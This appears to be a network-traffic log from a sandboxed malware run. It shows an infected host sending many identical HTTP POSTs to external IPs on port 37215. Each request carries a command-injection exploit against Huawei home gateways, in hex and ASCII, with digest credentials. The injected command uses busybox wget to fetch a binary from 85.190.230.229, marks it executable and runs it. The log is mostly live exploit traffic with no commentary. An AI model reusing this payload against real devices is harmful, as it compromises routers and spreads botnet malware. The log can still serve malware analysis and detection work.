                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425816059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361635923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      40192.168.2.1460188156.242.69.19237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.573246002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.715591908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.963300943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      41192.168.2.1453888102.152.191.9837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.574476004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.922195911 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.418160915 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.410059929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.394018888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425848007 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
